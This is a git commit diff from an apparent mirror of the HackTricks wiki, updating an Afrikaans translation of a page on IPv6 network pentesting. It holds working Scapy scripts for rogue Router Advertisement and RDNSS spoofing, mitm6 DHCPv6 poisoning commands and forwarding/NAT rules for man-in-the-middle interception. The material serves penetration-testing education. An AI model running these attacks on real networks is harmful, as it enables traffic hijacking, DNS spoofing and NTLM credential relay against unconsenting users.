mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['src/generic-methodologies-and-resources/pentesting-network/
This commit is contained in:
parent
5978cc6de0
commit
9e7207d618
@ -9,10 +9,10 @@
|
||||
IPv6 adresse is gestruktureer om netwerkorganisasie en toestelinteraksie te verbeter. 'n IPv6 adres is verdeel in:
|
||||
|
||||
1. **Netwerk Vooraf**: Die aanvanklike 48 bits, wat die netwerksegment bepaal.
|
||||
2. **Subnet ID**: Die volgende 16 bits, wat gebruik word om spesifieke subnets binne die netwerk te definieer.
|
||||
2. **Subnet ID**: Volgende 16 bits, gebruik om spesifieke subnets binne die netwerk te definieer.
|
||||
3. **Interface Identifiseerder**: Die laaste 64 bits, wat 'n toestel binne die subnet uniek identifiseer.
|
||||
|
||||
Terwyl IPv6 die ARP-protokol wat in IPv4 voorkom, weglat, stel dit **ICMPv6** met twee primêre boodskappe bekend:
|
||||
Terwyl IPv6 die ARP-protokol wat in IPv4 voorkom, weglat, stel dit **ICMPv6** in met twee primêre boodskappe:
|
||||
|
||||
- **Neighbor Solicitation (NS)**: Multicast boodskappe vir adresoplossing.
|
||||
- **Neighbor Advertisement (NA)**: Unicast antwoorde op NS of spontane aankondigings.
|
||||
@ -40,7 +40,7 @@ alive6 eth0
|
||||
```
|
||||
IPv6 adresse kan afgelei word van 'n toestel se MAC adres vir plaaslike kommunikasie. Hier is 'n vereenvoudigde gids oor hoe om die Link-local IPv6 adres af te lei van 'n bekende MAC adres, en 'n kort oorsig van IPv6 adres tipes en metodes om IPv6 adresse binne 'n netwerk te ontdek.
|
||||
|
||||
### **Afleiding van Link-local IPv6 vanaf MAC Adres**
|
||||
### **Aflei van Link-local IPv6 vanaf MAC Adres**
|
||||
|
||||
Gegewe 'n MAC adres **`12:34:56:78:9a:bc`**, kan jy die Link-local IPv6 adres soos volg saamstel:
|
||||
|
||||
@ -51,7 +51,7 @@ Gegewe 'n MAC adres **`12:34:56:78:9a:bc`**, kan jy die Link-local IPv6 adres so
|
||||
### **IPv6 Adres Tipes**
|
||||
|
||||
- **Unieke Plaaslike Adres (ULA)**: Vir plaaslike kommunikasie, nie bedoel vir openbare internet routering nie. Vooraf: **`FEC00::/7`**
|
||||
- **Multicast Adres**: Vir een-tot-baie kommunikasie. Gelewer aan alle interfaces in die multicast groep. Vooraf: **`FF00::/8`**
|
||||
- **Multicast Adres**: Vir een-tot-baie kommunikasie. Afgelewer aan alle interfaces in die multicast groep. Vooraf: **`FF00::/8`**
|
||||
- **Anycast Adres**: Vir een-tot-nabyste kommunikasie. Gestuur na die naaste interface volgens die routering protokol. Deel van die **`2000::/3`** globale unicast reeks.
|
||||
|
||||
### **Adres Vooraf**
|
||||
@ -82,7 +82,7 @@ ip -6 neigh # Display the neighbor table
|
||||
Verskeie tegnieke bestaan om MitM-aanvalle in IPv6-netwerke uit te voer, soos:
|
||||
|
||||
- Spoofing van ICMPv6 buurman of router advertensies.
|
||||
- Gebruik van ICMPv6 herleiding of "Pakket Te Groot" boodskappe om routing te manipuleer.
|
||||
- Gebruik van ICMPv6 herleiding of "Packet Too Big" boodskappe om routing te manipuleer.
|
||||
- Aanval op mobiele IPv6 (gewoonlik vereis dit dat IPSec gedeaktiveer word).
|
||||
- Opstel van 'n rogue DHCPv6 bediener.
|
||||
|
||||
@ -128,7 +128,7 @@ sudo sysctl -w net.ipv4.tcp_tw_reuse=1
|
||||
```
|
||||
### Passiewe NDP & DHCPv6 Snuffeling
|
||||
|
||||
Omdat elke IPv6 gasheer **automaties verskeie multicast groepe byvoeg** (`ff02::1`, `ff02::2`, …) en ICMPv6 praat vir SLAAC/NDP, kan jy die hele segment in kaart bring sonder om 'n enkele pakket te stuur. Die volgende Python/Scapy een-liner luister na die mees interessante L2 boodskappe en druk 'n gekleurde, tydstempel log van wie is wie:
|
||||
Omdat elke IPv6 gasheer **automaties verskeie multicast groepe aansluit** (`ff02::1`, `ff02::2`, …) en ICMPv6 praat vir SLAAC/NDP, kan jy die hele segment in kaart bring sonder om 'n enkele pakket te stuur. Die volgende Python/Scapy een-liner luister na die mees interessante L2 boodskappe en druk 'n gekleurde, tydstempel log van wie is wie:
|
||||
```python
|
||||
#!/usr/bin/env python3
|
||||
from scapy.all import *
|
||||
@ -199,7 +199,7 @@ Resultaat: 'n volledige **link-lokale topologie** (MAC ⇄ IPv6) binne 'n paar s
|
||||
|
||||
### Router Advertensie (RA) Spoofing
|
||||
|
||||
IPv6 gasheerrekenaars staatmaak op **ICMPv6 Router Advertensies** vir standaard-gateway ontdekking. As jy vervalste RA's **meer gereeld** as die wettige router inspuit, sal toestelle stilweg na jou as die gateway oorgeskakel word.
|
||||
IPv6 gasheer staatmaak op **ICMPv6 Router Advertensies** vir standaard-gateway ontdekking. As jy vervalste RA's **meer gereeld** as die wettige router inspuit, sal toestelle stilweg na jou as die gateway oorgaan.
|
||||
```python
|
||||
#!/usr/bin/env python3
|
||||
from scapy.all import *
|
||||
@ -227,9 +227,36 @@ sudo sysctl -w net.ipv6.conf.all.forwarding=1
|
||||
sudo ip6tables -A FORWARD -i eth0 -j ACCEPT
|
||||
sudo ip6tables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
|
||||
```
|
||||
#### Router Advertensie Vlaggies (M/O) & Standaard Router Voorkeur (Prf)
|
||||
|
||||
| Vlag | Betekenis | Effek op Klient Gedrag |
|
||||
|------|-----------|-------------------------|
|
||||
| **M (Geregelde Adres Konfigurasie)** | Wanneer op `1` gestel, moet die gasheer **DHCPv6** gebruik om sy IPv6 adres te verkry. | Hele adressering kom van DHCPv6 – perfek vir *mitm6* styl vergiftiging. |
|
||||
| **O (Ander Konfigurasie)** | Wanneer op `1` gestel, moet die gasheer **DHCPv6** slegs gebruik om *ander* inligting (DNS, NTP, …) te verkry. | Adres steeds via SLAAC, maar DNS kan met DHCPv6 gehuig word. |
|
||||
| **M=0 / O=0** | Suiwer SLAAC netwerk. | Slegs RA / RDNSS truuks is moontlik – DHCPv6 sal nie deur kliënte gestuur word nie. |
|
||||
| **M=1 / O=1** | Gemengde omgewing. | Beide DHCPv6 en SLAAC word gebruik; die oppervlak vir spoofing is die grootste. |
|
||||
|
||||
Tydens 'n pentest kan jy eenvoudig die wettige RA een keer inspekteer en besluit watter vektor haalbaar is:
|
||||
```bash
|
||||
sudo tcpdump -vvv -i eth0 'icmp6 && ip6[40] == 134' # capture Router Advertisements
|
||||
```
|
||||
Soek na die `flags [M,O]` veld in die dump – geen raaiwerk nodig nie.
|
||||
|
||||
Die **Prf** (Router Voorkeur) veld binne die RA kop beheers hoe aantreklik jou rogue router lyk wanneer *meerdere* gateways teenwoordig is:
|
||||
|
||||
| Prf waarde | Binêr | Betekenis |
|
||||
|-----------|--------|---------|
|
||||
| **Hoog** | `10` | Kliente verkies hierdie router bo enige *Medium*/*Lae* een |
|
||||
| Medium (verstek) | `01` | Gebruik deur byna elke wettige toestel |
|
||||
| Lae | `00` | Gekoos slegs wanneer daar geen beter router bestaan nie |
|
||||
|
||||
Wanneer jy die pakket met Scapy genereer, kan jy dit deur die `prf` parameter stel soos hierbo gewys (`prf=0x1` → Hoog). Die kombinasie van **Hoë Prf**, 'n **kort interval**, en 'n **nie-nul lewensduur** maak jou rogue gateway merkwaardig stabiel.
|
||||
|
||||
---
|
||||
|
||||
### RDNSS (DNS) Spoofing via RA
|
||||
|
||||
[RFC 8106](https://datatracker.ietf.org/doc/html/rfc8106) laat die toevoeging van 'n **Recursive DNS Server (RDNSS)** opsie binne 'n RA toe. Moderne OSes (Win 10 ≥1709, Win 11, macOS Big Sur, Linux systemd-resolved, …) vertrou dit outomaties:
|
||||
[RFC 8106](https://datatracker.ietf.org/doc/html/rfc8106) laat die toevoeging van 'n **Recursive DNS Server (RDNSS)** opsie binne 'n RA toe. Moderne OSes (Win 10 ≥1709, Win 11, macOS Big Sur, Linux systemd-resolved, …) vertrou dit outomaties:
|
||||
```python
|
||||
#!/usr/bin/env python3
|
||||
from scapy.all import *
|
||||
@ -249,11 +276,11 @@ ICMPv6NDOptRDNSS(dns=[args.dns],lifetime=args.lifetime))
|
||||
|
||||
send(ra,iface=args.interface,loop=1,inter=args.interval)
|
||||
```
|
||||
Clients sal **voeg** jou DNS by hul resolver lys vir die gegewe leeftyd, wat volle DNS-hijacking toelaat totdat die waarde verval of jy 'n `lifetime=0` terugtrek stuur.
|
||||
Clients sal **prepend** jou DNS aan hul resolver lys vir die gegewe leeftyd, wat volle DNS-hijacking toelaat totdat die waarde verval of jy 'n `lifetime=0` terugtrek stuur.
|
||||
|
||||
### DHCPv6 DNS Spoofing (mitm6)
|
||||
|
||||
In plaas van SLAAC, staat Windows-netwerke dikwels op **stateless DHCPv6** vir DNS. [mitm6](https://github.com/rofl0r/mitm6) antwoord outomaties op `Solicit` boodskappe met 'n **Advertise → Reply** vloei wat **jou link-lokale adres as DNS vir 300 sekondes toewys**. Dit ontsluit:
|
||||
In plaas van SLAAC, hang Windows-netwerke dikwels af van **stateless DHCPv6** vir DNS. [mitm6](https://github.com/rofl0r/mitm6) antwoord outomaties op `Solicit` boodskappe met 'n **Advertise → Reply** vloei wat **jou link-lokale adres as DNS vir 300 sekondes toewys**. Dit ontsluit:
|
||||
|
||||
* NTLM relay-aanvalle (WPAD + DNS hijacking)
|
||||
* Interceptie van interne naamresolusie sonder om roeters aan te raak
|
||||
@ -276,5 +303,6 @@ sudo mitm6 -i eth0 --no-ra # only DHCPv6 poisoning
|
||||
- [RFC 8106 – IPv6 ND DNS Konfigurasie](https://datatracker.ietf.org/doc/html/rfc8106)
|
||||
- [http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html](http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html)
|
||||
- [https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904](https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904)
|
||||
- [Praktiese Gids vir IPv6 Aanvalle in 'n Plaaslike Netwerk](https://habr.com/ru/articles/930526/)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
Loading…
x
Reference in New Issue
Block a user